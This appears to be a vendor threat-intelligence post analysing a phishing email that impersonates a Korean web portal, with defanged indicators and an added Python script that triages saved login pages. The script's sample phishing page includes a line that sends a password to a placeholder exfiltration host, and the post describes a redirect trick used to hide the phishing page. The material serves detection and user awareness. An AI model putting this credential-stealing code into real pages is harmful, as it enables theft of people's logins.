The ASEC analysis team has recently discovered a phishing email that impersonates a well-known Korean web portal to collect user credentials. The email urges users to upgrade their mailbox storage and prompts them to click a link. Clicking the link redirects the user to a phishing page that asks for their password.
The figure below shows the subject and body of the email; the link in the body redirects the user to the phishing page.
Upon clicking the link in the email, the user is redirected to a phishing page disguised as the login page of a well-known Korean web portal (see figure below).
- Phishing website URL: hxxp://www.eylulrentacar[.]com/indexh.html
Unlike a genuine web portal login page, the phishing page offers none of the usual features such as login with a one-time number, QR code login, find ID, reset password, or sign-up.
The login button on the phishing page triggers the checkInput function, which checks that a password has been entered and then passes the collected information to the send function, which transmits it to the attacker's server.
- C2 server: hxxps://v2.faj[.]ma/wordpress/wp-includes/js/tinymce/plugins/wordpress/plugins.php
The send function not only sends the account credentials to the attacker's server; it also tracks how many times it has run in a count variable and, once the phishing page has already submitted the data, redirects the user to the legitimate web portal login page so that the phishing page is harder to detect.
To avoid falling victim to such phishing emails, users should be careful when clicking links in emails from unknown senders, check the URL the link points to, and confirm that the page's features work as expected.
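To triage a saved copy of a suspected login page for the three indicators described above (missing portal features, credential sinks on another host, and a count-gated redirect to the legitimate portal), here is an added Python example; it is not ASEC's code, and the two sample pages, the `.example`/`.invalid` hostnames and the score weights are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Auxiliary features a genuine portal login page normally offers (as listed in
# the analysis); matched case-insensitively against link text or markup.
EXPECTED_FEATURES = ("one-time", "qr code", "find id", "reset password", "sign up")

# Places where a login page hands the credentials or the user off to another host:
# form actions, fetch/XHR targets, and location changes.
_SINK_RE = re.compile(
    r"""(?:action\s*=\s*|fetch\(\s*|\.open\(\s*['"]\w+['"]\s*,\s*|location(?:\.href)?\s*=\s*)"""
    r"""['"](https?://[^'"]+)['"]""", re.I)
# A counter that gates a redirect: the cloaking trick described for the send function.
_COUNT_RE = re.compile(r"\bcount\b\s*(?:[><=!]=?|\+\+)|\+\+\s*count\b")
_REDIRECT_RE = re.compile(r"location(?:\.href)?\s*=")


def triage_login_page(page_url: str, html: str) -> dict:
    """Score a saved login page against the indicators; higher means more suspicious."""
    own_host = urlparse(page_url).hostname
    lowered = html.lower()
    missing = [f for f in EXPECTED_FEATURES if f not in lowered]
    sinks = {urlparse(u).hostname for u in _SINK_RE.findall(html)}
    off_host = sorted(h for h in sinks if h and h != own_host)
    count_gated = bool(_COUNT_RE.search(html)) and bool(_REDIRECT_RE.search(html))
    score = len(missing) + 2 * len(off_host) + (3 if count_gated else 0)
    return {"missing_features": missing, "off_host_sinks": off_host,
            "count_gated_redirect": count_gated, "score": score}


# Constructed sample pages with placeholder domains (not the real indicators).
PHISH_HTML = """<form onsubmit="checkInput();return false"><input type=password id=pw></form>
<script>var count = 0;
function send(pw){ if (count > 0) { location.href = 'https://portal.example/login'; return; }
  count++; fetch('https://exfil.invalid/collect.php', {method:'POST', body: pw}); }
function checkInput(){ var pw = document.getElementById('pw').value; if (pw) send(pw); }
</script>"""
LEGIT_HTML = """<form action="https://login.portal.example/auth"><input type=password></form>
<a href="/otp">One-time number</a> <a href="/qr">QR code</a> <a href="/find">Find ID</a>
<a href="/reset">Reset password</a> <a href="/join">Sign up</a>"""

if __name__ == "__main__":
    print(triage_login_page("http://lookalike.invalid/indexh.html", PHISH_HTML))
    print(triage_login_page("https://login.portal.example/", LEGIT_HTML))
```

The heuristic is deliberately coarse: a legitimate page that loads scripts from a CDN is not flagged, because only form actions, fetch/XHR targets and location changes count as sinks.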
AhnLab currently blocks the domain of this phishing page.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.